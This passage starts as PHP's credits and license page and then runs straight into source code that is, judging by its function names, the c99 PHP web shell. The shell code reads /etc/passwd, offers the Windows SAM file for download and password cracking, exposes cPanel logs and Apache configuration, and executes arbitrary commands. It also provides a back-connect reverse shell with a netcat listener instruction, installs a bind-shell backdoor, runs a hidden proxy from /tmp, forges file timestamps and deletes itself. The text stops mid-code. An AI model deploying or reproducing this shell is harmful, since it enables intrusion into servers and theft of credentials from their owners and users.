Input Filter Rasmus Lerdorf, Derick Rethans, Pierre-Alain Joye, Ilia Alshanetsky
InterBase Jouni Ahto, Andrew Avdeev, Ard Biesheuvel
Internationalization Ed Batutis, Vladimir Iordanov, Dmitry Lakhtyuk, Stanislav Malyshev, Vadim Savchuk, Kirti Velankar
JSON Jakub Zelenka, Omar Kilani, Scott MacVicar
LDAP Amitay Isaacs, Eric Warnke, Rasmus Lerdorf, Gerrit Thomson, Stig Venaas
LIBXML Christian Stocker, Rob Richards, Marcus Boerger, Wez Furlong, Shane Caraveo
Multibyte String Functions Tsukada Takuya, Rui Hirokawa
MySQL driver for PDO George Schlossnagle, Wez Furlong, Ilia Alshanetsky, Johannes Schlueter
MySQLi Zak Greant, Georg Richter, Andrey Hristov, Ulf Wendel
MySQLnd Andrey Hristov, Ulf Wendel, Georg Richter, Johannes Schl├╝ter
OCI8 Stig Bakken, Thies C. Arntzen, Andy Sautins, David Benson, Maxim Maletsky, Harald Radi, Antony Dovgal, Andi Gutmans, Wez Furlong, Christopher Jones, Oracle Corporation
ODBC driver for PDO Wez Furlong
ODBC Stig Bakken, Andreas Karajannis, Frank M. Kromann, Daniel R. Kalowsky
Opcache Andi Gutmans, Zeev Suraski, Stanislav Malyshev, Dmitry Stogov, Xinchen Hui
OpenSSL Stig Venaas, Wez Furlong, Sascha Kettler, Scott MacVicar
Oracle (OCI) driver for PDO Wez Furlong
pcntl Jason Greene, Arnaud Le Blanc
Perl Compatible Regexps Andrei Zmievski
PHP Archive Gregory Beaver, Marcus Boerger
PHP Data Objects Wez Furlong, Marcus Boerger, Sterling Hughes, George Schlossnagle, Ilia Alshanetsky
PHP hash Sara Golemon, Rasmus Lerdorf, Stefan Esser, Michael Wallner, Scott MacVicar
Posix Kristian Koehntopp
PostgreSQL driver for PDO Edin Kadribasic, Ilia Alshanetsky
PostgreSQL Jouni Ahto, Zeev Suraski, Yasuo Ohgaki, Chris Kings-Lynne
Pspell Vlad Krupin
Readline Thies C. Arntzen
Recode Kristian Koehntopp
Reflection Marcus Boerger, Timm Friebe, George Schlossnagle, Andrei Zmievski, Johannes Schlueter
Sessions Sascha Schumann, Andrei Zmievski
Shared Memory Operations Slava Poliakov, Ilia Alshanetsky
SimpleXML Sterling Hughes, Marcus Boerger, Rob Richards
SNMP Rasmus Lerdorf, Harrie Hazewinkel, Mike Jackson, Steven Lawrance, Johann Hanne, Boris Lytochkin
SOAP Brad Lafountain, Shane Caraveo, Dmitry Stogov
Sockets Chris Vandomelen, Sterling Hughes, Daniel Beulshausen, Jason Greene
Sodium Frank Denis
SPL Marcus Boerger, Etienne Kneuss
SQLite 3.x driver for PDO Wez Furlong
SQLite3 Scott MacVicar, Ilia Alshanetsky, Brad Dewar
System V Message based IPC Wez Furlong
System V Semaphores Tom May
System V Shared Memory Christian Cartus
tidy John Coggeshall, Ilia Alshanetsky
tokenizer Andrei Zmievski, Johannes Schlueter
WDDX Andrei Zmievski
XML Stig Bakken, Thies C. Arntzen, Sterling Hughes
XMLReader Rob Richards
xmlrpc Dan Libby
XMLWriter Rob Richards, Pierre-Alain Joye
XSL Christian Stocker, Rob Richards
Zip Pierre-Alain Joye, Remi Collet
Zlib Rasmus Lerdorf, Stefan Roehrich, Zeev Suraski, Jade Nicoletti, Michael Wallner
PHP Documentation
Authors Mehdi Achour, Friedhelm Betz, Antony Dovgal, Nuno Lopes, Hannes Magnusson, Philip Olson, Georg Richter, Damien Seguy, Jakub Vrana, Adam Harvey
Editor Peter Cowburn
User Note Maintainers Daniel P. Brown, Thiago Henrique Pojda
Other Contributors Previously active authors, editors and other contributors are listed in the manual.
PHP Quality Assurance Team
Ilia Alshanetsky, Joerg Behrens, Antony Dovgal, Stefan Esser, Moriyoshi Koizumi, Magnus Maatta, Sebastian Nohn, Derick Rethans, Melvyn Sopacua, Jani Taskinen, Pierre-Alain Joye, Dmitry Stogov, Felipe Pena, David Soria Parra, Stanislav Malyshev, Julien Pauli, Stephen Zarkos, Anatol Belski, Remi Collet, Ferenc Kovacs
Websites and Infrastructure team
PHP Websites Team Rasmus Lerdorf, Hannes Magnusson, Philip Olson, Lukas Kahwe Smith, Pierre-Alain Joye, Kalle Sommer Nielsen, Peter Cowburn, Adam Harvey, Ferenc Kovacs, Levi Morrison
Event Maintainers Damien Seguy, Daniel P. Brown
Network Infrastructure Daniel P. Brown
Windows Infrastructure Alex Schoenmaker

PHP License

This program is free software; you can redistribute it and/or modify it under the terms of the PHP License as published by the PHP Group and included in the distribution in the file: LICENSE

This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.

If you did not receive a copy of the PHP license, or have any questions about PHP licensing, please contact license@php.net.

; c99shexit();}if ($act == "security"){ echo "
Server Information:
Open base dir: ".$hopenbasedir."
"; if (!$win) { if ($nixpasswd) { if ($nixpasswd == 1) {$nixpasswd = 0;} echo "*nix /etc/passwd:
"; if (!is_numeric($nixpwd_s)) {$nixpwd_s = 0;} if (!is_numeric($nixpwd_e)) {$nixpwd_e = $nixpwdperpage;} echo "
<input type=hidden name=act value=\"security\"><input type=hidden name=\"nixpasswd\" value=\"1\">From:&nbsp;<input type=\"text=\" name=\"nixpwd_s\" value=\"".$nixpwd_s."\">&nbsp;To:&nbsp;<input type=\"text\" name=\"nixpwd_e\" value=\"".$nixpwd_e."\">&nbsp;<input type=submit value=\"View\">

"; $i = $nixpwd_s; while ($i < $nixpwd_e) { $uid = posix_getpwuid($i); if ($uid) { $uid["dir"] = "<a href=\"".$surl."act=ls&d=".urlencode($uid["dir"])."\">".$uid["dir"]."</a>"; echo join(":",$uid)."
"; } $i++; } } else {echo "
<a href=\"".$surl."act=security&nixpasswd=1&d=".$ud."\"><u>Get /etc/passwd</u></a>
";} } else { $v = $_SERVER["WINDIR"]."\repair\sam"; if (file_get_contents($v)) {echo "<font color=red>You can't crack winnt passwords(".$v.") </font>
";} else {echo "
<font color=red>You can crack winnt passwords. <a href=\"".$surl."act=f&f=sam&d=".$_SERVER["WINDIR"]."\\repair&ft=download\"><u>Download</u></a>, and use lcp.crack+ ?</font>
";} } if (file_get_contents("/etc/userdomains")) {echo "<font color=red><a href=\"".$surl."act=f&f=userdomains&d=".urlencode("/etc")."&ft=txt\"><u>View cpanel user-domains logs</u></a></font>
";} if (file_get_contents("/var/cpanel/accounting.log")) {echo "<font color=red><a href=\"".$surl."act=f&f=accounting.log&d=".urlencode("/var/cpanel/")."\"&ft=txt><u>View cpanel logs</u></a></font>
";} if (file_get_contents("/usr/local/apache/conf/httpd.conf")) {echo "<font color=red><a href=\"".$surl."act=f&f=httpd.conf&d=".urlencode("/usr/local/apache/conf")."&ft=txt\"><u>Apache configuration (httpd.conf)</u></a></font>
";} if (file_get_contents("/etc/httpd.conf")) {echo "<font color=red><a href=\"".$surl."act=f&f=httpd.conf&d=".urlencode("/etc")."&ft=txt\"><u>Apache configuration (httpd.conf)</u></a></font>
";} if (file_get_contents("/etc/syslog.conf")) {echo "<font color=red><a href=\"".$surl."act=f&f=syslog.conf&d=".urlencode("/etc")."&ft=txt\"><u>Syslog configuration (syslog.conf)</u></a></font>
";} if (file_get_contents("/etc/motd")) {echo "<font color=red><a href=\"".$surl."act=f&f=motd&d=".urlencode("/etc")."&ft=txt\"><u>Message Of The Day</u></a></font>
";} if (file_get_contents("/etc/hosts")) {echo "<font color=red><a href=\"".$surl."act=f&f=hosts&d=".urlencode("/etc")."&ft=txt\"><u>Hosts</u></a></font>
";} function displaysecinfo($name,$value) {if (!empty($value)) {if (!empty($name)) {$name = "".$name." - ";} echo $name.nl2br($value)."
";}} displaysecinfo("OS Version?",myshellexec("cat /proc/version")); displaysecinfo("Kernel version?",myshellexec("sysctl -a | grep version")); displaysecinfo("Distrib name",myshellexec("cat /etc/issue.net")); displaysecinfo("Distrib name (2)",myshellexec("cat /etc/*-realise")); displaysecinfo("CPU?",myshellexec("cat /proc/cpuinfo")); displaysecinfo("RAM",myshellexec("free -m")); displaysecinfo("HDD space",myshellexec("df -h")); displaysecinfo("List of Attributes",myshellexec("lsattr -a")); displaysecinfo("Mount options ",myshellexec("cat /etc/fstab")); displaysecinfo("Is cURL installed?",myshellexec("which curl")); displaysecinfo("Is lynx installed?",myshellexec("which lynx")); displaysecinfo("Is links installed?",myshellexec("which links")); displaysecinfo("Is fetch installed?",myshellexec("which fetch")); displaysecinfo("Is GET installed?",myshellexec("which GET")); displaysecinfo("Is perl installed?",myshellexec("which perl")); displaysecinfo("Where is apache",myshellexec("whereis apache")); displaysecinfo("Where is perl?",myshellexec("whereis perl")); displaysecinfo("locate proftpd.conf",myshellexec("locate proftpd.conf")); displaysecinfo("locate httpd.conf",myshellexec("locate httpd.conf")); displaysecinfo("locate my.conf",myshellexec("locate my.conf")); displaysecinfo("locate psybnc.conf",myshellexec("locate psybnc.conf"));}if ($act == "mkfile"){ if ($mkfile != $d) { if (file_exists($mkfile)) {echo "Make File \"".htmlspecialchars($mkfile)."\": object alredy exists";} elseif (!fopen($mkfile,"w")) {echo "Make File \"".htmlspecialchars($mkfile)."\": access denied";} else {$act = "f"; $d = dirname($mkfile); if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} $f = basename($mkfile);} } else {$act = $dspact = "ls";}}if ($act == "encoder"){ echo "<script>function set_encoder_input(text) {document.forms.encoder.input.value = text;}</script>Encoder:

<input type=hidden name=act value=encoder>Input:
<textarea name=\"encoder_input\" id=\"input\" cols=50 rows=5>".@htmlspecialchars($encoder_input)."</textarea>

<input type=submit value=\"calculate\">


"; foreach(array("md5","crypt","sha1","crc32") as $v) { echo $v." - <input type=text size=50 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".$v($encoder_input)."\" readonly>
"; } echo "
urlencode - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".urlencode($encoder_input)."\" readonly>
urldecode - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".htmlspecialchars(urldecode($encoder_input))."\" readonly>

base64_encode - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".base64_encode($encoder_input)."\" readonly>"; echo "
base64_decode - "; if (base64_encode(base64_decode($encoder_input)) != $encoder_input) {echo "<input type=text size=35 value=\"failed\" disabled readonly>";} else { $debase64 = base64_decode($encoder_input); $debase64 = str_replace("\0","[0]",$debase64); $a = explode("\r\n",$debase64); $rows = count($a); $debase64 = htmlspecialchars($debase64); if ($rows == 1) {echo "<input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".$debase64."\" id=\"debase64\" readonly>";} else {$rows++; echo "<textarea cols=\"40\" rows=\"".$rows."\" onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" id=\"debase64\" readonly>".$debase64."</textarea>";} echo "&nbsp;<a href=\"#\" onclick=\"set_encoder_input(document.forms.encoder.debase64.value)\"></a>"; } echo "

Base convertations:

dec2hex - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\""; $c = strlen($encoder_input); for($i=0;$i<$c;$i++) { $hex = dechex(ord($encoder_input[$i])); if ($encoder_input[$i] == "&") {echo $encoder_input[$i];} elseif ($encoder_input[$i] != "\\") {echo "%".$hex;} } echo "\" readonly>
";}if ($act == "backc"){ $ip = $_SERVER["REMOTE_ADDR"]; $msg = $_POST['backcconnmsg']; $emsg = $_POST['backcconnmsge']; echo("Back-Connection:

Host:<input type=text name=backconnectip size=15 value=$ip> Port: <input type=text name=backconnectport size=15 value=5992> Use: <select size=1 name=use><option value=Perl>Perl</option><option value=C>C</option></select> <input type=submit name=submit value=Connect>
Click 'Connect' only after you open port for it first. Once open, use NetCat, and run 'nc -l -n -v -p 5992'

"); echo("$msg"); echo("$emsg");}if ($act == "shbd"){$msg = $_POST['backcconnmsg'];$emsg = $_POST['backcconnmsge'];echo("Bind Shell Backdoor:

Bind Port: <input type='text' name='backconnectport' value='5992'><input type='hidden' name='use' value='shbd'><input type='submit' value='Install Backdoor'>
");echo("$msg");echo("$emsg");}if ($act == "proxy") { cf("/tmp/hantu.tgz",$proxy_shit); ex("cd /tmp;tar -zxvf hantu.tgz"); ex("cd /tmp;cd .setan;chmod 777 xh"); ex("cd /tmp;cd .setan;chmod 777 httpd"); ex("cd /tmp;cd .setan;./xh -s [kmod] ./httpd start"); checkproxyhost(); $msg = $_POST['proxyhostmsg']; echo("$msg"); unlink("/tmp/hantu.tgz"); ex("cd /tmp; rm -r .setan"); }if ($act == "selfremove"){ if (($submit == $rndcode) and ($submit != "")) { if (unlink(__FILE__)) {@ob_clean(); echo "Gone!"; c99shexit(); } else {echo "
Can't delete ".__FILE__."!
";} } else { if (!empty($rndcode)) {echo "Error: incorrect confimation!";} $rnd = rand(0,9).rand(0,9).rand(0,9); echo "
<input type=hidden name=act value=selfremove>Self-remove: ".__FILE__."

For confirmation, enter \"".$rnd."\"
:&nbsp;<input type=hidden name=rndcode value=\"".$rnd."\"><input type=text name=submit>&nbsp;<input type=submit value=\"YES\">
"; }}if ($act == "search"){ echo "Search file-system:

"; if (empty($search_in)) {$search_in = $d;} if (empty($search_name)) {$search_name = "(.*)"; $search_name_regexp = 1;} if (empty($search_text_wwo)) {$search_text_regexp = 0;} if (!empty($submit)) { $found = array(); $found_d = 0; $found_f = 0; $search_i_f = 0; $search_i_d = 0; $a = array ( "name"=>$search_name, "name_regexp"=>$search_name_regexp, "text"=>$search_text, "text_regexp"=>$search_text_regxp, "text_wwo"=>$search_text_wwo, "text_cs"=>$search_text_cs, "text_not"=>$search_text_not ); $searchtime = getmicrotime(); $in = array_unique(explode(";",$search_in)); foreach($in as $v) {c99fsearch($v);} $searchtime = round(getmicrotime()-$searchtime,4); if (count($found) == 0) {echo "No files found!";} else { $ls_arr = $found; $disp_fullpath = TRUE; $act = "ls"; } } echo "
<input type=hidden name=\"d\" value=\"".$dispd."\"><input type=hidden name=act value=\"".$dspact."\">File/folder name: <input type=\"text\" name=\"search_name\" size=\"".round(strlen($search_name)+25)."\" value=\"".htmlspecialchars($search_name)."\">&nbsp;<input type=\"checkbox\" name=\"search_name_regexp\" value=\"1\" ".($search_name_regexp == 1?" checked":"")."> - regexp
Directory:&nbsp;&nbsp; <input type=\"text\" name=\"search_in\" size=\"".round(strlen($search_in)+25)."\" value=\"".htmlspecialchars($search_in)."\">
Text:&nbsp;&nbsp;<input type=text name=\"search_text\" size=42 value=".htmlspecialchars($search_text).">

<input type=\"checkbox\" name=\"search_text_regexp\" value=\"1\" ".($search_text_regexp == 1?" checked":"")."> - regexp&nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_wwo\" value=\"1\" ".($search_text_wwo == 1?" checked":"")."> - <u>w</u>hole words only&nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_cs\" value=\"1\" ".($search_text_cs == 1?" checked":"")."> - cas<u>e</u> sensitive&nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_not\" value=\"1\" ".($search_text_not == 1?" checked":"")."> - find files <u>NOT</u> containing the text

<input type=submit name=submit value=\"Search\">
"; if ($act == "ls") {$dspact = $act; echo "<hr size=\"1\" noshade>Search took ".$searchtime." secs (".$search_i_f." files and ".$search_i_d." folders, ".round(($search_i_f+$search_i_d)/$searchtime,4)." objects per second).

";}}if ($act == "chmod"){ $mode = fileperms($d.$f); if (!$mode) {echo "Change file-mode with error: can't get current value.";} else { $form = TRUE; if ($chmod_submit) { $octet = "0".base_convert(($chmod_o["r"]?1:0).($chmod_o["w"]?1:0).($chmod_o["x"]?1:0).($chmod_g["r"]?1:0).($chmod_g["w"]?1:0).($chmod_g["x"]?1:0).($chmod_w["r"]?1:0).($chmod_w["w"]?1:0).($chmod_w["x"]?1:0),2,8); if (chmod($d.$f,$octet)) {$act = "ls"; $form = FALSE; $err = "";} else {$err = "Can't chmod to ".$octet.".";} } if ($form) { $perms = parse_perms($mode); echo "Changing file-mode (".$d.$f."), ".view_perms_color($d.$f)." (".substr(decoct(fileperms($d.$f)),-4,4).")
".($err?"Error: ".$err:"")."
<input type=hidden name=d value=\"".htmlspecialchars($d)."\"><input type=hidden name=f value=\"".htmlspecialchars($f)."\"><input type=hidden name=act value=chmod><table align=left width=300 border=0 cellspacing=0 cellpadding=5>Owner

<input type=checkbox NAME=chmod_o[r] value=1".($perms["o"]["r"]?" checked":"").">&nbsp;Read
<input type=checkbox name=chmod_o[w] value=1".($perms["o"]["w"]?" checked":"").">&nbsp;Write
<input type=checkbox NAME=chmod_o[x] value=1".($perms["o"]["x"]?" checked":"").">eXecuteGroup

<input type=checkbox NAME=chmod_g[r] value=1".($perms["g"]["r"]?" checked":"").">&nbsp;Read
<input type=checkbox NAME=chmod_g[w] value=1".($perms["g"]["w"]?" checked":"").">&nbsp;Write
<input type=checkbox NAME=chmod_g[x] value=1".($perms["g"]["x"]?" checked":"").">eXecute</font>World

<input type=checkbox NAME=chmod_w[r] value=1".($perms["w"]["r"]?" checked":"").">&nbsp;Read
<input type=checkbox NAME=chmod_w[w] value=1".($perms["w"]["w"]?" checked":"").">&nbsp;Write
<input type=checkbox NAME=chmod_w[x] value=1".($perms["w"]["x"]?" checked":"").">eXecute</font><input type=submit name=chmod_submit value=\"Save\">
"; } }}if ($act == "upload"){ $uploadmess = ""; $uploadpath = str_replace("\\",DIRECTORY_SEPARATOR,$uploadpath); if (empty($uploadpath)) {$uploadpath = $d;} elseif (substr($uploadpath,-1) != "/") {$uploadpath .= "/";} if (!empty($submit)) { global $HTTP_POST_FILES; $uploadfile = $HTTP_POST_FILES["uploadfile"]; if (!empty($uploadfile["tmp_name"])) { if (empty($uploadfilename)) {$destin = $uploadfile["name"];} else {$destin = $userfilename;} if (!move_uploaded_file($uploadfile["tmp_name"],$uploadpath.$destin)) {$uploadmess .= "Error uploading file ".$uploadfile["name"].". Can't copy \"".$uploadfile["tmp_name"]."\" to \"".$uploadpath.$destin."\".

";} } elseif (!empty($uploadurl)) { if (!empty($uploadfilename)) {$destin = $uploadfilename;} else { $destin = explode("/",$destin); $destin = $destin[count($destin)-1]; if (empty($destin)) { $i = 0; $b = ""; while(file_exists($uploadpath.$destin)) {if ($i > 0) {$b = "_".$i;} $destin = "index".$b.".html"; $i++;}} } if ((!eregi("http://",$uploadurl)) and (!eregi("https://",$uploadurl)) and (!eregi("ftp://",$uploadurl))) {echo "Incorect url!
";} else { $st = getmicrotime(); $content = @file_get_contents($uploadurl); $dt = round(getmicrotime()-$st,4); if (!$content) {$uploadmess .= "Can't download file!
";} else { if ($filestealth) {$stat = stat($uploadpath.$destin);} $fp = fopen($uploadpath.$destin,"w"); if (!$fp) {$uploadmess .= "Error writing to file ".htmlspecialchars($destin)."!
";} else { fwrite($fp,$content,strlen($content)); fclose($fp); if ($filestealth) {touch($uploadpath.$destin,$stat[9],$stat[8]);} } } } } } if ($miniform) { echo "".$uploadmess.""; $act = "ls"; } else { echo "File upload:
Select file on your local computer: <input name=\"uploadfile\" type=\"file\">
Input URL: <input name=\"uploadurl\" type=\"text\" value=\"".htmlspecialchars($uploadurl)."\" size=\"70\">

Save this file dir: <input name=\"uploadpath\" size=\"70\" value=\"".$dispd."\">

File-name (auto-fill): <input name=uploadfilename size=25>

<input type=checkbox name=uploadautoname value=1 id=df4>&nbsp;convert file name to lovercase

<input type=submit name=submit value=\"Upload\">
"; }}if ($act == "delete"){ $delerr = ""; foreach ($actbox as $v) { $result = FALSE; $result = fs_rmobj($v); if (!$result) {$delerr .= "Can't delete ".htmlspecialchars($v)."
";} } if (!empty($delerr)) {echo "Deleting with errors:
".$delerr;} $act = "ls";}if (!$usefsbuff){ if (($act == "paste") or ($act == "copy") or ($act == "cut") or ($act == "unselect")) {echo "
Sorry, buffer is disabled. For enable, set directive \"\$useFSbuff\" as TRUE.
";}}else{ if ($act == "copy") {$err = ""; $sess_data["copy"] = array_merge($sess_data["copy"],$actbox); c99_sess_put($sess_data); $act = "ls"; } elseif ($act == "cut") {$sess_data["cut"] = array_merge($sess_data["cut"],$actbox); c99_sess_put($sess_data); $act = "ls";} elseif ($act == "unselect") {foreach ($sess_data["copy"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["copy"][$k]);}} foreach ($sess_data["cut"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["cut"][$k]);}} c99_sess_put($sess_data); $act = "ls";} if ($actemptybuff) {$sess_data["copy"] = $sess_data["cut"] = array(); c99_sess_put($sess_data);} elseif ($actpastebuff) { $psterr = ""; foreach($sess_data["copy"] as $k=>$v) { $to = $d.basename($v); if (!fs_copy_obj($v,$to)) {$psterr .= "Can't copy ".$v." to ".$to."!
";} if ($copy_unset) {unset($sess_data["copy"][$k]);} } foreach($sess_data["cut"] as $k=>$v) { $to = $d.basename($v); if (!fs_move_obj($v,$to)) {$psterr .= "Can't move ".$v." to ".$to."!
";} unset($sess_data["cut"][$k]); } c99_sess_put($sess_data); if (!empty($psterr)) {echo "Pasting with errors:
".$psterr;} $act = "ls"; } elseif ($actarcbuff) { $arcerr = ""; if (substr($actarcbuff_path,-7,7) == ".tar.gz") {$ext = ".tar.gz";} else {$ext = ".tar.gz";} if ($ext == ".tar.gz") {$cmdline = "tar cfzv";} $cmdline .= " ".$actarcbuff_path; $objects = array_merge($sess_data["copy"],$sess_data["cut"]); foreach($objects as $v) { $v = str_replace("\\",DIRECTORY_SEPARATOR,$v); if (substr($v,0,strlen($d)) == $d) {$v = basename($v);} if (is_dir($v)) { if (substr($v,-1) != DIRECTORY_SEPARATOR) {$v .= DIRECTORY_SEPARATOR;} $v .= "*"; } $cmdline .= " ".$v; } $tmp = realpath("."); chdir($d); $ret = myshellexec($cmdline); chdir($tmp); if (empty($ret)) {$arcerr .= "Can't call archivator (".htmlspecialchars(str2mini($cmdline,60)).")!
";} $ret = str_replace("\r\n","\n",$ret); $ret = explode("\n",$ret); if ($copy_unset) {foreach($sess_data["copy"] as $k=>$v) {unset($sess_data["copy"][$k]);}} foreach($sess_data["cut"] as $k=>$v) { if (in_array($v,$ret)) {fs_rmobj($v);} unset($sess_data["cut"][$k]); } c99_sess_put($sess_data); if (!empty($arcerr)) {echo "Archivation errors:
".$arcerr;} $act = "ls"; } elseif ($actpastebuff) { $psterr = ""; foreach($sess_data["copy"] as $k=>$v) { $to = $d.basename($v); if (!fs_copy_obj($v,$d)) {$psterr .= "Can't copy ".$v." to ".$to."!
";} if ($copy_unset) {unset($sess_data["copy"][$k]);} } foreach($sess_data["cut"] as $k=>$v) { $to = $d.basename($v); if (!fs_move_obj($v,$d)) {$psterr .= "Can't move ".$v." to ".$to."!
";} unset($sess_data["cut"][$k]); } c99_sess_put($sess_data); if (!empty($psterr)) {echo "Pasting with errors:
".$psterr;} $act = "ls"; }}if ($act == "cmd"){if (trim($cmd) == "ps aux") {$act = "processes";}elseif (trim($cmd) == "tasklist") {$act = "processes";}else{ @chdir($chdir); if (!empty($submit)) { $execcmd = $_REQUEST['cmd']; echo "Result Of Locally Executed Command: $execcmd
"; $olddir = realpath("."); @chdir($d); $ret = myshellexec($cmd); $ret = convert_cyr_string($ret,"d","w"); if ($cmd_txt) { $rows = count(explode("\r\n",$ret))+1; if ($rows < 10) {$rows = 10;} echo "
<textarea cols=\"122\" rows=\"".$rows."\" readonly>".htmlspecialchars($ret)."</textarea>"; } else {echo $ret."
";} @chdir($olddir); } else {echo "Execution command"; if (empty($cmd_txt)) {$cmd_txt = TRUE;}} echo "
<input type=hidden name=act value=cmd><textarea name=cmd cols=122 rows=10>".htmlspecialchars($cmd)."</textarea><input type=hidden name=\"d\" value=\"".$dispd."\">

<input type=submit name=submit value=\"Execute\">&nbsp;Display in text-area&nbsp;<input type=\"checkbox\" name=\"cmd_txt\" value=\"1\""; if ($cmd_txt) {echo " checked";} echo ">
";}}if ($act == "ls"){ if (count($ls_arr) > 0) {$list = $ls_arr;} else { $list = array(); if ($h = @opendir($d)) { while (($o = readdir($h)) !== FALSE) {$list[] = $d.$o;} closedir($h); } else {} } if (count($list) == 0) {echo "
Can't open folder ".htmlspecialchars($d)."
";} else { //Building array $objects = array(); $vd = "f"; //Viewing mode if ($vd == "f") { $objects["head"] = array(); $objects["folders"] = array(); $objects["links"] = array(); $objects["files"] = array(); foreach ($list as $v) { $o = basename($v); $row = array(); if ($o == ".") {$row[] = $d.$o; $row[] = "LINK";} elseif ($o == "..") {$row[] = $d.$o; $row[] = "LINK";} elseif (is_dir($v)) { if (is_link($v)) {$type = "LINK";} else {$type = "DIR";} $row[] = $v; $row[] = $type; } elseif(is_file($v)) {$row[] = $v; $row[] = filesize($v);} $row[] = filemtime($v); if (!$win) { $ow = posix_getpwuid(fileowner($v)); $gr = posix_getgrgid(filegroup($v)); $row[] = ($ow["name"]?$ow["name"]:fileowner($v))."/".($gr["name"]?$gr["name"]:filegroup($v)); } $row[] = fileperms($v); if (($o == ".") or ($o == "..")) {$objects["head"][] = $row;} elseif (is_link($v)) {$objects["links"][] = $row;} elseif (is_dir($v)) {$objects["folders"][] = $row;} elseif (is_file($v)) {$objects["files"][] = $row;} $i++; } $row = array(); $row[] = "Name"; $row[] = "Size"; $row[] = "Modify"; if (!$win) {$row[] = "Owner/Group";} $row[] = "Perms"; $row[] = "Action"; $parsesort = parsesort($sort); $sort = $parsesort[0].$parsesort[1]; $k = $parsesort[0]; if ($parsesort[1] != "a") {$parsesort[1] = "d";} $y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&sort=".$k.($parsesort[1] == "a"?"d":"a")."\">"; $y .= "[Sort-".($parsesort[1] == "a"?"Asc.":"Desc")."]</a>"; $row[$k] .= $y; for($i=0;$i<count($row)-1;$i++) { if ($i != $k) {$row[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&sort=".$i.$parsesort[1]."\">".$row[$i]."</a>";} } $v = $parsesort[0]; usort($objects["folders"], "tabsort"); usort($objects["links"], "tabsort"); usort($objects["files"], "tabsort"); if ($parsesort[1] == "d") { $objects["folders"] = array_reverse($objects["folders"]); $objects["files"] = array_reverse($objects["files"]); } $objects = array_merge($objects["head"],$objects["folders"],$objects["links"],$objects["files"]); $tab = array(); $tab["cols"] = array($row); $tab["head"] = array(); $tab["folders"] = array(); $tab["links"] = array(); $tab["files"] = array(); $i = 0; foreach ($objects as $a) { $v = $a[0]; $o = basename($v); $dir = dirname($v); if ($disp_fullpath) {$disppath = $v;} else {$disppath = $o;} $disppath = str2mini($disppath,60); if (in_array($v,$sess_data["cut"])) {$disppath = "<strike>".$disppath."</strike>";} elseif (in_array($v,$sess_data["copy"])) {$disppath = "<u>".$disppath."</u>";} foreach ($regxp_highlight as $r) { if (ereg($r[0],$o)) { if ((!is_numeric($r[1])) or ($r[1] > 3)) {$r[1] = 0; ob_clean(); echo "Warning! Configuration error in \$regxp_highlight[".$k."][0] - unknown command."; c99shexit();} else { $r[1] = round($r[1]); $isdir = is_dir($v); if (($r[1] == 0) or (($r[1] == 1) and !$isdir) or (($r[1] == 2) and !$isdir)) { if (empty($r[2])) {$r[2] = ""; $r[3] = "";} $disppath = $r[2].$disppath.$r[3]; if ($r[4]) {break;} } } } } $uo = urlencode($o); $ud = urlencode($dir); $uv = urlencode($v); $row = array(); if ($o == ".") { $row[] = "&nbsp;<a href=\"".$surl."act=".$dspact."&d=".urlencode(realpath($d.$o))."&sort=".$sort."\">".$o."</a>"; $row[] = "LINK"; } elseif ($o == "..") { $row[] = "&nbsp;<a href=\"".$surl."act=".$dspact."&d=".urlencode(realpath($d.$o))."&sort=".$sort."\">".$o."</a>"; $row[] = "LINK"; } elseif (is_dir($v)) { if (is_link($v)) { $disppath .= " => ".readlink($v); $type = "LINK"; $row[] = "&nbsp;<a href=\"".$surl."act=ls&d=".$uv."&sort=".$sort."\">[".$disppath."]</a>"; } else { $type = "DIR"; $row[] = "&nbsp;<a href=\"".$surl."act=ls&d=".$uv."&sort=".$sort."\">[".$disppath."]</a>"; } $row[] = $type; } elseif(is_file($v)) { $ext = explode(".",$o); $c = count($ext)-1; $ext = $ext[$c]; $ext = strtolower($ext); $row[] = "&nbsp;<a href=\"".$surl."act=f&f=".$uo."&d=".$ud."&\">".$disppath."</a>"; $row[] = view_size($a[1]); } $row[] = date("d.m.Y H:i:s",$a[2]); if (!$win) {$row[] = $a[3];} $row[] = "<a href=\"".$surl."act=chmod&f=".$uo."&d=".$ud."\">".view_perms_color($v)."</a>"; if ($o == ".") {$checkbox = "<input type=\"checkbox\" name=\"actbox[]\" onclick=\"ls_reverse_all();\">"; $i--;} else {$checkbox = "<input type=\"checkbox\" name=\"actbox[]\" id=\"actbox".$i."\" value=\"".htmlspecialchars($v)."\">";} if (is_dir($v)) {$row[] = "<a href=\"".$surl."act=d&d=".$uv."\">[Info]</a>&nbsp;".$checkbox;} else {$row[] = "<a href=\"".$surl."act=f&f=".$uo."&ft=info&d=".$ud."\">[Info]</a>&nbsp;<a href=\"".$surl."act=f&f=".$uo."&ft=edit&d=".$ud."\">[Change]</a>&nbsp;<a href=\"".$surl."act=f&f=".$uo."&ft=download&d=".$ud."\">[Download]</a>&nbsp;".$checkbox;} if (($o == ".") or ($o == "..")) {$tab["head"][] = $row;} elseif (is_link($v)) {$tab["links"][] = $row;} elseif (is_dir($v)) {$tab["folders"][] = $row;} elseif (is_file($v)) {$tab["files"][] = $row;} $i++; } } // Compiling table $table = array_merge($tab["cols"],$tab["head"],$tab["folders"],$tab["links"],$tab["files"]); echo "
